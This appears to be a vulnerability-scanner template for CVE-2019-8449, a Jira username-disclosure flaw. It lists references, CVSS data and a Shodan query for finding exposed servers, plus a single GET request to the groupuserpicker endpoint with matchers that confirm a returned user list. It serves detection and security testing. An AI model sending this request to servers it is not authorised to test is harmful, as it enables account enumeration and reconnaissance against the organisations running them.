id: CVE-2019-8449 info: name: Jira <8.4.0 - Information Disclosure author: harshbothra_ severity: medium description: Jira before 8.4.0 is susceptible to information disclosure. The /rest/api/latest/groupuserpicker resource can allow an attacker to enumerate usernames, and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations. reference: - https://www.doyler.net/security-not-included/more-jira-enumeration - https://jira.atlassian.com/browse/JRASERVER-69796 - http://packetstormsecurity.com/files/156172/Jira-8.3.4-Information-Disclosure.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2019-8449 cwe-id: CWE-306 epss-score: 0.14234 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" vendor: atlassian product: jira tags: atlassian,jira,disclosure,packetstorm,cve,cve2019 http: - method: GET path: - '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true' matchers-condition: and matchers: - type: word part: body words: - '{"users":{"users":' - type: status status: - 200